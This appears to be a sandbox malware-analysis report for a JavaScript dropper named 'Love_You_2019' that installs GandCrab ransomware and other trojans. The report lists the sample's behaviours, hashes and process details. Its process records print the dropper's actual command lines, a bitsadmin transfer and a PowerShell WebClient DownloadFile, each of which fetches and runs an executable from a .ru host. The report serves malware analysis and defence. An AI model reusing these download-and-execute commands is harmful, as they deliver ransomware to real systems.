General Info

File name

Love_You_2019_33235120-txt.zip

Verdict
Malicious activity
Analysis date
1/10/2019, 17:48:03
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

4ba6f3bb179c007d8235821b4dfb3b2e

SHA1

2372175819b3fc2ee9e828b2f54749a0abaa224c

SHA256

b25d091456ac14f044c01f9449d4dd86687fd083d563a43d5571d485283e917a

SSDEEP

24:LraergaheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWn6UtcX4oAphGpxraeLgkg:faergahi8Y9M4VDOK1mIEtO6UtMAphGY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Deletes shadow copies
  • 3468116065.exe (PID: 2180)
Application was dropped or rewritten from another process
  • 3782739527.exe (PID: 3124)
  • 3358028963.exe (PID: 3828)
  • 3088011411.exe (PID: 2124)
  • 1958842343.exe (PID: 2160)
  • winsvcs.exe (PID: 2928)
  • 3875839546.exe (PID: 3676)
  • 3468116065.exe (PID: 2180)
  • wincfg32svc.exe (PID: 3568)
  • 2746537711.exe (PID: 3736)
  • 979574639568794.exe (PID: 3844)
  • 495958594939.exe (PID: 1820)
  • winsvcs.exe (PID: 2648)
Changes settings of System certificates
  • 3468116065.exe (PID: 2180)
Dropped file may contain instructions of ransomware
  • 3468116065.exe (PID: 2180)
Renames files like Ransomware
  • 3468116065.exe (PID: 2180)
Connects to CnC server
  • 3468116065.exe (PID: 2180)
Disables Windows Defender Real-time monitoring
  • winsvcs.exe (PID: 2928)
Actions look like stealing of personal data
  • 3468116065.exe (PID: 2180)
Writes file to Word startup folder
  • 3468116065.exe (PID: 2180)
Downloads executable files from the Internet
  • winsvcs.exe (PID: 2648)
  • powershell.exe (PID: 3784)
Disables Windows System Restore
  • winsvcs.exe (PID: 2928)
GandCrab keys found
  • 3468116065.exe (PID: 2180)
Downloads executable files from IP
  • winsvcs.exe (PID: 2648)
Changes the autorun value in the registry
  • 3875839546.exe (PID: 3676)
  • 2746537711.exe (PID: 3736)
  • 979574639568794.exe (PID: 3844)
Changes Security Center notification settings
  • winsvcs.exe (PID: 2928)
Uses BITSADMIN.EXE for downloading application
  • cmd.exe (PID: 2544)
Executes PowerShell scripts
  • cmd.exe (PID: 2700)
Reads Internet Cache Settings
  • 3468116065.exe (PID: 2180)
Adds / modifies Windows certificates
  • 3468116065.exe (PID: 2180)
Starts itself from another location
  • winsvcs.exe (PID: 2928)
  • 2746537711.exe (PID: 3736)
  • 3875839546.exe (PID: 3676)
  • 979574639568794.exe (PID: 3844)
Reads the cookies of Mozilla Firefox
  • 3468116065.exe (PID: 2180)
Executable content was dropped or overwritten
  • winsvcs.exe (PID: 2928)
  • 3875839546.exe (PID: 3676)
  • 2746537711.exe (PID: 3736)
  • winsvcs.exe (PID: 2648)
  • 979574639568794.exe (PID: 3844)
  • powershell.exe (PID: 3784)
Creates files like Ransomware instruction
  • 3468116065.exe (PID: 2180)
Connects to SMTP port
  • wincfg32svc.exe (PID: 3568)
Creates files in the program directory
  • 3468116065.exe (PID: 2180)
Creates files in the user directory
  • winsvcs.exe (PID: 2648)
  • powershell.exe (PID: 3784)
  • 3468116065.exe (PID: 2180)
Starts CMD.EXE for commands execution
  • WScript.exe (PID: 2884)
Dropped object may contain TOR URLs
  • 3468116065.exe (PID: 2180)


Static information

TRiD
.zip: ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2004:01:10 15:25:17
ZipCRC:
0x96a24e80
ZipCompressedSize:
1155
ZipUncompressedSize:
1155
ZipFileName:
Love_You_2019_33235120-txt.js

Processes

Total processes
53
Monitored processes
19
Malicious processes
9
Suspicious processes
1

Behavior graph

Process chain (the graph itself is rendered interactively in the full report; each node is either dropped by or downloaded by its parent):
winrar.exe (no specs), wscript.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), bitsadmin.exe (no specs), powershell.exe, 979574639568794.exe, winsvcs.exe, 495958594939.exe (no specs), 2746537711.exe, 3875839546.exe, winsvcs.exe, wincfg32svc.exe, 3468116065.exe (#GANDCRAB), 1958842343.exe (no specs), 3088011411.exe (no specs), wmic.exe (no specs), 3358028963.exe (no specs), 3782739527.exe (no specs)
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

PID
2820
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
2884
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll

PID
2544
CMD
"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bitsadmin.exe
c:\users\admin\appdata\local\temp\495958594939.exe

PID
2700
CMD
"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3664
CMD
bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\system32\bitsadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3784
CMD
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\windows\system32\netutils.dll

PID
3844
CMD
"C:\Users\admin\AppData\Local\Temp\979574639568794.exe"
Path
C:\Users\admin\AppData\Local\Temp\979574639568794.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\users\admin\495030305060\winsvcs.exe

PID
2648
CMD
C:\Users\admin\495030305060\winsvcs.exe
Path
C:\Users\admin\495030305060\winsvcs.exe
Indicators
Parent process
979574639568794.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\495030305060\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\2746537711.exe
c:\users\admin\appdata\local\temp\3875839546.exe
c:\users\admin\appdata\local\temp\3468116065.exe
c:\users\admin\appdata\local\temp\3358028963.exe
c:\users\admin\appdata\local\temp\3782739527.exe

PID
1820
CMD
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\495958594939.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll

PID
3736
CMD
C:\Users\admin\AppData\Local\Temp\2746537711.exe
Path
C:\Users\admin\AppData\Local\Temp\2746537711.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2746537711.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\657607470096780\winsvcs.exe

PID
3676
CMD
C:\Users\admin\AppData\Local\Temp\3875839546.exe
Path
C:\Users\admin\AppData\Local\Temp\3875839546.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3875839546.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
